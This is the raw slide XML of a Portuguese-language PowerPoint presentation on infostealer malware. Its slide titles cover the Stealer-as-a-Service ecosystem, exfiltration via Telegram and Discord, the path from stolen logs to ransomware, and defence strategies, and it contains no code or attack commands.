            <a:ext cx="2210047" cy="13234966"/>
            <a:chOff x="21153805" y="133256"/>
            <a:chExt cx="2210047" cy="13234966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B2FB264E-C12A-776D-C952-C64BFB3CF2D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="21153805" y="133256"/>
              <a:ext cx="2210047" cy="132349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pt-BR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5D4F473-30D1-7B24-21E0-B6C0DC5D722E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="21361809" y="8559113"/>
              <a:ext cx="1810580" cy="181390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pt-BR" dirty="0"/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B2B5FD60-2034-EA60-D245-16BB32109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359080" y="240517"/>
              <a:ext cx="1791088" cy="2370104"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom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785B67FB-ACAF-1DAB-1E80-DB2E6D57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404324" y="2551699"/>
              <a:ext cx="1791088" cy="2370104"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Imagem 7" descr="Diagrama, Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{957B4D53-E217-4430-766B-B713BFD02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381300" y="5063372"/>
              <a:ext cx="1793161" cy="1412023"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Imagem 8" descr="Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE2601A3-FB4E-A0CD-27DC-25B9F455C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377590" y="6616964"/>
              <a:ext cx="1800579" cy="1800579"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Imagem 9" descr="Ícone&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6A19EB1-A25E-018A-9A0A-C95B412FB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384833" y="8559113"/>
              <a:ext cx="1810580" cy="1810580"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Imagem 10" descr="Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C35979-6D6E-3E2D-1EE9-532FBB4F0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359080" y="11310622"/>
              <a:ext cx="1836333" cy="1589881"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Imagem 13" descr="Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7C0B824-AAA4-D712-7A1A-316926241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1359080" y="10567447"/>
              <a:ext cx="1842622" cy="538788"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{536967BB-ACEF-F551-457A-F2E75DCBE9B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17957001" y="-114736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6954504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ACBB59-9EC1-20D8-4F8E-389D7DC0F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9B9F7FBE-5861-2AAF-4703-E396DAEAA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40C42E3-2017-B929-DF85-F49C9D456128}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2044956" y="2603500"/>
            <a:ext cx="14708438" cy="993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63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AGENDA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="63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77EBF71-DA12-8880-15F9-384D81828EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1755948" y="3759200"/>
            <a:ext cx="17947343" cy="619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ct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B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r>
              <a:rPr lang="pt-BR" sz="4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Introdução.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B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r>
              <a:rPr lang="pt-BR" sz="4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 Novo Rosto do Cibercrime.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B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r>
              <a:rPr lang="en-US" sz="4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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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Ecossistema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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Stealer-as-a-Service (SaaS).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B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r>
              <a:rPr lang="en-US" sz="4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Principais</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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TTPs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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utilizadas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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r>
              <a:rPr lang="en-US" sz="4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pelos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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r>
              <a:rPr lang="en-US" sz="4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atacantes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B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r>
              <a:rPr lang="pt-BR" sz="4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Anatomia da Exfiltração via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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Telegram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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Discord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B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r>
              <a:rPr lang="pt-BR" sz="4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O Pós-Infecção: Do Log ao </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B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r>
              <a:rPr lang="pt-BR" sz="4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Estratégias de Defesa e Mitigação</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgb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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1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Conclusão</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/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.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1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AC8E6C32-21C6-78E5-2B29-B91DB4EB2FED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5365115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53755-FE23-4E6D-5662-D5AAD90D0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5AAA9E51-EB35-AA5A-DB18-D1CAD7A6B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6CCA586-FAAF-AEC9-2E4C-D80AA29898E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="15788073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INTRODUÇÃO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09EBED1-D4AF-BA6D-8480-78FB8C3BCC87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="4381500"/>
            <a:ext cx="12777797" cy="175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8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O QUE SÃO INFOSTEALERS?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48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QUAL É O OBJETIVO DO ATAQUE?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48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TIPOS DE DADOS COLETADOS?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48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O VALOR DESSES DADOS NA DARKWEB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48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</a:rPr>
              <a:t>DO FTP AO WEBHOOK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagem 6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6C3BFE51-234D-F3EF-3D26-FC7B0082F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3586" y="1991049"/>
            <a:ext cx="11774353" cy="2804885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagem 8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926F2190-615B-DC57-1113-A3D59E7BB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3523" y="5395785"/>
            <a:ext cx="11774352" cy="3581200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Imagem 10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0CCC72C2-8728-550D-DDE6-5A60D5A379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3523" y="9507235"/>
            <a:ext cx="11774415" cy="2954684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992D1F4D-5F23-1CAB-9CDB-7FB863F575A2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394509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51BA5F-CA47-59E4-1171-37EFD1A15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53FDABA2-8D72-3050-278E-05A284E66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82A194B-9E26-2AF1-F580-F525E28CDA7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="15788073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O NOVO ROSTO DO CIBERCRIME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B80ACC0-EE1B-2FA6-84A8-9A8CF9287F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19052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pt-BR" sz="48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FIM DA ERA DO "LONER HACKER”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4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O DADO COMO "LOG“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4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>USO MASSIVO DE APIS E WEBHOOKS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t-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A CONEXÃO COM O RANSOMWARE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Imagem 12" descr="Mapa&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{879C844B-A47A-DFF1-23FB-582F7BE17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8074" y="3758576"/>
            <a:ext cx="12908426" cy="791861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A66D07F-458B-77D4-5FD3-BC383FA4FF3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12077683" y="12118681"/>
            <a:ext cx="110770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2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Mapa de calor de infecções do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Lumma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="32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BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> em dispositivos Windows. Fonte: Microsoft</a:t>
            </a:r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D54F75A4-DEEA-85E6-FF61-BA0AB220A9D2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8395064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83BC46-0F5A-1933-4A64-ECE71E7DC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C179B6D7-88B2-12E6-7363-BE7B26AFB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A506C97-7216-E47B-30F4-7E260FB4DE82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="15788073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O NOVO ROSTO DO CIBERCRIME</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="80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F9E4A39-AA65-DF53-E593-82BF033D0D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6655012" y="12484737"/>
            <a:ext cx="11077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2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Logs de ataques à venda. Fonte: Sekoia.io</a:t>
            </a:r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6" name="Imagem 5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6B59B561-8623-0581-F980-6C18FDC32F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907" b="7331"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1829441" y="3216340"/>
            <a:ext cx="20652496" cy="901025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CB7BB477-02E6-78AC-423F-DDC5F9812C01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9132191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5B7205-6BAE-C3D4-A380-493112EFD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DEE593C7-8907-43EC-9212-BF94E0741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4387048" cy="6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BDB7CE9-A4CA-C74B-16CB-361A87F85E25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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80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O ECOSSISTEMA “STEALER-AS-A-SERVICE”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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A8115E2-C740-E3A5-29CE-69E35750D29C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="43815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n-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill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EDF7C0B-8863-AC6D-DE5B-0D75C7E17C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057638" y="4533900"/>
            <a:ext cx="12777797" cy="832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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/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A TERCEIRIZAÇÃO DO DESENVOLVIMENTO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4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MODELOS DE MONETIZAÇÃO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4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INFRAESTRUTURA "PLUG AND PLAY”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4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUPORTE E COMUNIDADE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4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O VALOR AGREGADO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagem 6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235D9F5-CD8F-AFF7-F91C-39E8FD8A5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7347" y="4825895"/>
            <a:ext cx="11267135" cy="4952587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84B55968-2A08-CDF6-BB80-5E546153534F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21233601" y="-115172"/>
            <a:ext cx="15788073" cy="1023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3600" kern="0" spc="315" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Gotham HTF Book" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gotham HTF Book" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Gotham HTF Book" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>LUCAS LEMES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5593973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2032</TotalTime>
  <Words>1942</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Personalizar</PresentationFormat>
  <Paragraphs>275</Paragraphs>
  <Slides>32</Slides>
  <Notes>32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8" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Gotham HTF Book</vt:lpstr>
      <vt:lpstr>Gotham HTF Medium</vt:lpstr>
      <vt:lpstr>Roboto Bold</vt:lpstr>
      <vt:lpstr>Roboto Regular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Lucas Lemes</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-08T16:34:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-30T13:28:19Z</dcterms:modified>
</cp:coreProperties>
</file>